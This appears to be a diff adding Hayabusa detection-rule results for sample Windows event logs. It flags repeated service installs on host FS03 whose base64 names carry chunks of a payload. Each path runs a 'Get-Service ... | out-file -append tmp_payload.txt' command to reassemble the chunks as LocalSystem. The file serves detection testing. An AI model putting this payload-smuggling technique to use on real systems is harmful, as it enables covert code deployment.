+2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
